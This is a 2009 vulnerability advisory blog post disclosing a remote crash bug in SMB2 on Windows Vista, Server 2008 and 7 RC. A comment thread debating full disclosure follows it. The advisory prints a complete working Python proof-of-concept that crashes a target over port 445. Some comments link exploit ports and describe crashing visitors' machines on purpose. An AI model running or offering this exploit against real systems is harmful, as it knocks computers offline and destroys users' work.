=============================================
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High
=============================================
I. VULNERABILITY
-------------------------
Windows Vista, Server 2008 < R2, 7 RC :
SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
II. BACKGROUND
-------------------------
Windows vista and newer Windows comes with a new SMB version named SMB2.
See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.
III. DESCRIPTION
-------------------------
[Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS patch, for another SMB2.0 security issue:
KB942624 (MS07-063)
Installing only this specific update on Vista SP0 create the following issue:
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used to identify the SMB dialect that will be used for futher communication.
IV. PROOF OF CONCEPT
-------------------------
Smb-Bsod.py:
#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
V. BUSINESS IMPACT
-------------------------
An attacker can remotly crash any Vista/Windows 7 machine with SMB enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.
VI. SYSTEMS AFFECTED
-------------------------
[Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 < R2, Windows 7 RC.
VII. SOLUTION
-------------------------
No patch available for the moment.
Close SMB feature and ports, until a patch is provided.
Configure your firewall properly
You can also follow the MS Workaround:
http://www.microsoft.com/technet/security/advisory/975497.mspx
VIII. REFERENCES
-------------------------
http://www.microsoft.com/technet/security/advisory/975497.mspx
http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
X. REVISION HISTORY
-------------------------
September 7th, 2009: Initial release
September 11th, 2009: Revision 1.0 release
XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
XII.Personal Notes
-------------------------
Many persons have suggested to update this advisory for RCE and not BSOD:
It wont be done, if they find a way to execute code, they will publish them advisory.
lulz
ReplyDeleteIf this vuln is real. Why didnt you reported it to Microsoft MSRC?
ReplyDeleteBecause it looks really stupid to publish this kind of thing on Full disclosure.
"Anonymous said...
ReplyDeleteIf this vuln is real. Why didnt you reported it to Microsoft MSRC?
Because it looks really stupid to publish this kind of thing on Full disclosure."
He may have months ago. Security through obscurity. If there's an inherent problem, it's important for anyone to allow end-users to make an informed decision about the risks involved. In short; MS need to jump on this with both feet rather than dawdle as is there usual response.
Anonymous said...
ReplyDeleteIf this vuln is real. Why didnt you reported it to Microsoft MSRC?
Because it looks really stupid to publish this kind of thing on Full disclosure.
VII. SOLUTION
-------------------------
Vendor contacted, but no patch available for the moment.
Close SMB feature and ports, until a patch is provided.
Perhaps read the text rather than voice opinions from an undeserved soap-box.
@Anonymous:
ReplyDeleteI have tried this exploit myself on a Windows 7 machine and it didn't work. Perhaps the code itself isn't the actual exploit, but an example of what it is/could be.
I tried this code from a Mac and from a backtrack image... neither caused the remote Windows 7 machine to BSOD. SMB was turned on and worked normally otherwise (as expected).
@zach, on windows7/vista you need to enable file sharing in your network connection center.
ReplyDeleteHas it been tested with an IDS / firewall or that kind of software?
ReplyDeleteTested against Windows7 x64, it does not work.
ReplyDelete@Anonymous:
ReplyDelete"Because it looks really stupid to publish this kind of thing on Full disclosure."
Not more stupid as to not submit this new code to a normal S.Q.A routine, before shipping that product on any P.C. by default.
@Marcos Orallo
ReplyDeleteenable file sharing;
it works.
Seems to work on 32 bit Vista, result: http://m.blog.hu/bu/buhera/image/vista_smbv2.png
ReplyDeleteWorks also ugainst Windows 2008 Server.
ReplyDeleteLaurent, this is a Remote code execution vulnerability not merely a DoS.
ReplyDeletehttp://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&task=show&action=view&id=64&Itemid=15
So you see Ruben says it works like a charm ...
ReplyDeleteNow, lets see what Microsoft will decide...
ReplyDeleteyeah Laurent, nice find btw.
ReplyDeleteOmg, Laurent, you've better place some mistakes at PoC to prevent some kiddies from using it on LAN.
ReplyDeleteI think it's great Laurent Gaffié disclosed it! Good work I bet you're using Linux at home just like me! Keep up the good work! Full Disclosure FTW!
ReplyDeleteI've made a Metasploit port of your PoC: (giving you credit of course)
http://pastie.org/609407
~ MaXe
Epic
ReplyDeleteslashdot front page nice job
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteWhat release of Windows 7 did u use?.
ReplyDeleteIm running the script on a Debian against a Windows 7 ultimate 64bits and a 32bits (both are 7600) and didn't work.
I have file sharing enabled, i can access both computer resources from a Windows XP without any problem (and im not even asked for user/password as i have it configured to not get asked for user/pass if that matters).
Oh and i don't have running any firewall (windows firewall is disabled) or any antivirus software.
ReplyDelete1. Disable windows firewall
ReplyDelete2. Enable file sharing
3. Run exploit
4. Have Fun
Nice find, thanks
ReplyDeleteThanks.
ReplyDeleteBut how in vista close Close SMB feature and ports please ?
Excellent, 2008 puked..and now that AD wont start.
ReplyDeleteYou ran this code against your domain controller? Nice.
ReplyDeleteAdd to that list bro...Windows 2008 With SP2!!!!!
ReplyDeleteIt was a DC on VBOX. Was suppose to use it for a security seminar...LOLZ...
ReplyDeleteDoes NOT work against the final realease of Windows 7 Enterprise in a domain environment, with firewall off and file sharing on. Doesn't work with firewall on and sharing off either :)
ReplyDeleteDoes work against fully updated Vista Enterprise.
Yup does not work on 7 RTM build 7600 (without domain membership) as well. Anyone tried on 2008R2?
ReplyDeletefull compatibility with w2k8 r2.
ReplyDeletecheck yours firewall configuration !
www.aboo.pl
How in the world did you even discover this?
ReplyDeleteNo effect on Win7 Pro x64, filesharing enabled, verified via Wireshark (packet arrives & response to packet is sent)
ReplyDeleteNew?
ReplyDeletehttp://social.answers.microsoft.com/Forums/en-US/vistahardware/thread/3bdd46f8-d47d-4a67-930d-48bc9a18b2c7
http://support.microsoft.com/search/default.aspx?catalog=LCID%3D1033&query=DRIVER_POWER_STATE_FAILURE&mode=r
added to Metasploit http://trac.metasploit.com/browser/framework3/trunk/modules/auxiliary/dos/windows/smb/smb2_negotiate_pidhigh.rb :)
ReplyDeleteWhen will be added remote code execution?
ReplyDeleteAlright, publishing this was a very jerk move on Laurent's part.
ReplyDeleteHe received a reply saying that no patch was available along with a workaround and he decided to post the exploit live anyway instead of waiting until it was fixed? Could a person be any more of a jerk? Microsoft takes all SMB vulnerabilities seriously, but instead of doing everyone a favor and just waiting until a patch were to be released, you decided to open it up to a realm of script kiddies bored at school/work who'll try to inflict as much damage as possible.
Sad.
Bryant, that means that Microsoft will ACTUALLY patch it in a timely manner. It may be a jerk move against Microsoft but it is better for everybody else.
ReplyDeleteI disagree with Bryant and sympathizers.
ReplyDeleteAfter giving MS ample time to rectify the problem it is imperative that the information and work around be disclosed far and wide. MS was notified, failed to promptly release a patch, so the matter is now in the hands of the public domain to manage.
If you properly firewalled your ports properly in the first place the exploit would be a non-issue.
Am I the only one who tires of the post-exploit-publication QQ?
/cries
ReplyDeleteTried with no results on Vista Ultimate 32bit. nmap shows 445 open, packet captured with wireshark, but no effects.
ReplyDeleteGood report if it was just a DoS, however god knows how many days of work this is going to cause admins due to remote code execution.
ReplyDeleteAll in the name of security, heh.
Disable SMB 2.0 and the exploit doesn't work anymore:
ReplyDeletehttp://www.petri.co.il/how-to-disable-smb-2-on-windows-vista-or-server-2008.htm
Looks like the good old winnuke is back. http://rapidshare.com/files/277352935/WinnukeV7.zip.html
ReplyDeleteWindows 7 is immune to this vulnerability.
ReplyDeleteif you run ESET Lab's NOD32 AV, its firewall filters the ports in such a way that you can't run the exploit.
ReplyDeleteworks like a charm, tested on Vista Home Premium 32bit (also works through Norton 360, 2009 - in [SHARED] ?default? local network)
ReplyDeleteWindows 7 RTM and Server 2008 R2 RTM are not vulnerable to this exploit. 7/2008 R2 RC are, as are Vista/2008. (Grouped by kernel family).
ReplyDeleteIt would be nice if they'd backport whatever they fixed in RTM to Vista, but as far as running Windows 7 / R2 beta versions, I don't sympathize.
As far as vulnerabilty reporting, it's not really acurate to say that this bug impacts Windows 7 if you haven't tested the RTM. If you are running RC code, you get what you pay for.
Releasing this allows people to protect themselves before there's a patch. You're assuming that only HE has found the exploit, a white-hat with good intentions. You think other people who might have found this are going to be so nice?
ReplyDeleteI'm having trouble getting it too work, but that just could be because it's complaining about bad headers in the crafted packet (it's been a while since i've done this..). Testing it out against win7 32 and 64 at home..hope to have results soon. Wireshark capture shows the packet is received by the remote computer and responded too, but no bsod. The problem seems to be in the header checksum.
ReplyDeleteWhat i cant beleive is that a bug in the filesharing part of the operating system can crash the whole thing... who writes these things?
ReplyDeleteWindows 7 is not affected. The affected version was Windows7 RC but not full officila release.
ReplyDeletehttp://www.microsoft.com/technet/security/advisory/975497.mspx
@Anonymous (above my post)
ReplyDeleteThat's exactly why i agree fully with full disclosure.
I imagine a group of blackhats getting angry cause yet another hidden 0day was disclosed :-P So I don't think people should get angry at Laurent, I'd do the same, willingly knowing that some script kiddies, worm makers and such would abuse it as well. But that's just the yin and yang principle.
HDM has by the way also added another module to the Metasploit framework which exploits another bug in the negotiate protocol / smb service.
Sorry i caught this a little late, should have expected something like this.
ReplyDeleteThanks for the B-day prez .. HIGH: --> :-)
To any of you complaining about disclosure ... your lucky this isnt weaponized and already wormed.
ReplyDeleteIts funny how after what, 200 million dollars+ and 7 years all it takes is 1 guy with enough brain power and that special kind of addiction to poke a hole in anything!
Cheers on the great find
Very nice work indeed.
ReplyDeleteGreat...
ReplyDeleteIt works against Windows 2008 but not Windows 7
I'm checking the Microsoft Tuesday Updates and there's nothing related.
Sniper
Putting this kind of info on publicly on the monday before patchday show malice.
ReplyDeleteNot disclosing responsibly is also bad faith.
Attention seeking misfit ?
Cool..good finding! Hope all security vendors have covered for this kind of vulnerability instead waiting for Microsoft patch.
ReplyDeletenice find laurent!
ReplyDeletecongraz!!
full-disclosure for life!!
Microsoft released advisory 975497 today saying that WIn7RTM and WIn2008R2 RTM are not vulnerable
ReplyDeleteC sources (if somebody needs): http://pastie.org/610829
ReplyDeleteThanks for great work, Laurent!
awesome ;D
ReplyDeleteDoes this remote exploit affect Vista even if the firewall--which is on by default--is running?
ReplyDeleteyes
ReplyDelete"yes" ^^^^
ReplyDeleteFrom reading up on this, the exploit doesn't work if Vista's firewall is set to 'Public' mode.
Winsock C source :)
ReplyDeletehttp://pastie.org/611098
Windows users make me laugh.
ReplyDeleteSeriously, any serious vendor would have contacted the guy begging him - not to disclose anything till a patch was released. But since this is M$...
Tough for them. If they start treating security like a real issue maybe i'll start using them.
The fix is diabling SMB2 via the registry and rebooting. This can be deployed through group policy.
ReplyDelete[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"SMB2"=dword:00000000
http://rapidshare.com/files/277781832/SMB2-TEST-FLAW-EDUCATIONAL.rar.html
ReplyDeleteI found an app that xploits this vulnerability but it needs .net.
This has been tested and works great.. here at my work we made a quick php script to send the malformed SMB packet to incoming systems.. everytime a Vista user visits the page their machine BSOD. :)
ReplyDeleteI have tested this and verified it works on:
Vista x32 -- All versions
Vista x64 -- All versions
Windows 7 -- Release cannidates (NOT RTM)
Windows Server 2008, pre RC2
Any machine above with 445 open and SMB (enabled by default) is effected.
Great job on the full disclosure!
Alexander: You have way too much time on your hands...
ReplyDeleteLaurent: Excellent find!
It was only a matter of time before a zero day was descovered, how long will it be before microsoft patch this bug?
ReplyDeleteI am development a scanner pool of threads in net of type B, C ... etc ... in python. I wait useful. Is in spanish but its very easy of translate.
ReplyDeletehttp://blogricardo.wordpress.com/2009/09/09/escaner-exploit-para-windows-vista-2008/
With all respect to Laurent and other commenters, the importance of not disclosing this kind of things is that: even with a disclosure a lot of good people won't know of it.
ReplyDeleteInstead, a lot of non-capable attackers now might have a method to harm, that would never have discovered on their own.
Microsoft will develop a solution, release a patch and still a lot of customers will be vulnerable months later. (cont.)
(cont.) Making Microsoft face red does not help anyone. While you have the right to tire of post-exploit patching, experience demonstrates that patching accelerates exploiting, and makes it broader.
ReplyDeleteThose who have a good IT management practice will probably not be vulnerable with or without a patch. Those who are vulnerable now are only exposed to a greater risk.
http://www.caughq.org/advisories/disclosure.html
ReplyDeleteYes, that sounds beautiful. But an available patch does not make a patched system
ReplyDeletenice finding..
ReplyDeletetested and work like a charm but not for win7 RTM.
just disable file & printer share for now until the patch release and block port 445 as well
why leaving this service enable when u dont rely on it?
hail macs.. lulz
My tests confirmed that this security issue is NOT Service Pack related, and was introduced by KB942624 (MS07-063) patch in december 2007.
ReplyDeleteOne news outlet reported that Laurent submitted the bug to Microsoft, but there was a typo in the e-mail address.
ReplyDeleteMistakes happen, but a little extra effort to contact the vendor could have been made. I know that Microsoft has forms, forums, and telephone numbers. Not saying you got to contact them all, but a single e-mail does not due diligence make.
If there was no response after several attempts over several days, then a public disclosure is warranted.
You didn't submitted the bug to the editor (or with a typo in the address, are you not able to type an address or was it on purpose), you post a proof of concept on patch day, when MS has no time to fix the hole before next month. It looks like you did everything on purpose.
ReplyDeleteIt would be funny for MS if nobody would use their software for important things. Today I saw a girl in my college who was weeping: she lost all her work because of script kiddies who reboot all the computers. Her exam is tomorrow.
Laurent, you're an asshole.
Hey not so "Anonymous",
ReplyDeleteRegarding my disclosure with MS, that's my choice, and i still think that on this specific case it was a good idea you'll see why.
However concerning the typo, i send the advisory (only to advise them) to microssoft.com , shit happens.
Full-Disclosure is usefull in such case because:
Anyone (including MS) who would have tested this critical component would have found this bug in a matter of seconds.
It showed this specific bug (my payload) was introduced by a security patch (MS07-063), showing us no S.Q.A and security testing
as been done on it before shipping it on any P.C
Even worse; an official Microsoft spokeman told Robert Lemos :
"We found this issue independently through our fuzzing processes and implemented the fix into Windows 7 RTM (release to manufacturer)
and Windows Server 2008 R2," see: http://www.technologyreview.com/blog/unsafebits/24105/?a=f
This mean, they knew about this issue but failed at protecting them customers.
Now that i published the remote teardrop advisory, they use the word "irresponsible disclosure" while patching on emergency what they
knew since a long time.
This is a serious error, as the bug was very easy to find, it was only a matter of time before someone disclose it...
Laurent Gaffie,
ReplyDeleteGreat research and discover. Also, great that you have disclosed it so the developper have to work on it.
A working exploit has beem made commercially available by Immunity Inc. (see securityfocus.org for a link)
ReplyDeleteA shame that it is only commercially available, cause I'd like to see how it abuses the 16 bits :-) Anyone care to share at least some sort of information?
It is also here: http://thepiratebay.org/torrent/5083672/Windows_Vista_7_SMB2.0_NEGOTIATE_PROTOCOL_Remote_BSOD_Tool
ReplyDeleteHello guys,
ReplyDeleteI have a file server(windows server 2008), but when I disable the smb2 it disconnect all the map drive of my client (in local network) do you know how to disable smb2 without interrupting map dire (file sharing)
Thanks in advance.
I have got the solution. Need to uncheck the default file and printer sharing from firewall and allow port 139, 445 from ip subnet.
ReplyDeleteaam's solution could work
ReplyDelete"It would be funny for MS if nobody would use their software for important things. Today I saw a girl in my college who was weeping: she lost all her work because of script kiddies who reboot all the computers. Her exam is tomorrow."
ReplyDeleteIf people used OSes that deserve the name, that wouldn't happen.
What VULNERABILITY is it exactly about? A shame that it is only commercially available. Anyone care to share at least some sort of information?
ReplyDeletei'll be sure to bookmark your blog
ReplyDeleteSo I suppose it's fixed now that it was in Windows 7 RC release?
ReplyDeleteguys,
ReplyDeleteThats microsoft fault... laurent only posted the PoC for BSoD ! not the working RCE exploit, ok?
so, you are jerk Bryant! cuz you use windows ;-)
thanks for sharing this site. there are lots of ebooks are available from here
ReplyDeletehttp://feboook.blogspot.com
Today I saw a girl in my college who was weeping: she lost all her work because of script kiddies who reboot all the computers. Her exam is tomorrow."
ReplyDeleteTerm paper
Tried running the script on my windows 7 virtual machine. packets were being sent and received (as noticed on wireshark) however, windows 7 did not crash. has the patch been made on the recent releases of windows 7? i had downloaded my present copy from msdnaa a week back...
ReplyDeletenice
ReplyDeleteSecurity through obscurity. If there's an inherent problem, it's important for anyone to allow end-users to make an informed decision about the risks involved. In short; MS need to jump on this with both feet rather than dawdle as is there usual response.
ReplyDeleteNowadays,I m using Mozilla and graphic are superb and excllent.
ReplyDeleteWindow vista was biggest flop .
Nice article, They are lucky it was you who discovered this and not someone with more sinister goals.
ReplyDeletenice article , i liked it very much
ReplyDeletethanks for sharing..
Security through obscurity. If there's an inherent problem, it's important for anyone to allow end-users to make an informed decision about the risks involved.
ReplyDeleteEven with a disclosure a lot of good people won't know of it. Instead, a lot of non-capable attackers now might have a method to harm, that would never have discovered on their own.
ReplyDeleteThat is amazing post A+ of this fantastic article
ReplyDeleteHe didn't report it to M$ cause he's not a Microsoft fanboy like most commenter here.
ReplyDeleteThis was fantastic post
ReplyDeleteI have had so many problems with vista that I have already given up and moved on. Window 7 is cool so far.
ReplyDeletewow...good info here....thanks for sharing...
ReplyDeleteWOW the information here is good. it somehow gave me an idea. thanks for the share.
ReplyDeleteVery nice article, They are lucky it was you who discovered this and not someone with more sinister goals...
ReplyDeletevery useful really helpful
ReplyDeleteVery nice article, indeed! Thanks.
ReplyDeleteWoW ! a lot of comments. I really dont know before that is so common ... Thank You for article.
ReplyDeleteWorks on Windows Derver 2008 Standard sp1
ReplyDeleteIt's very easy to find out any matter on web as compared to books, as I
ReplyDeletefound this post at this web page.
I’m not that much of a internet reader to be honest but your
ReplyDeletesites really nice, keep it up! I'll go ahead and bookmark
your site to come back later on. Cheers
Nice Blog Post !
ReplyDelete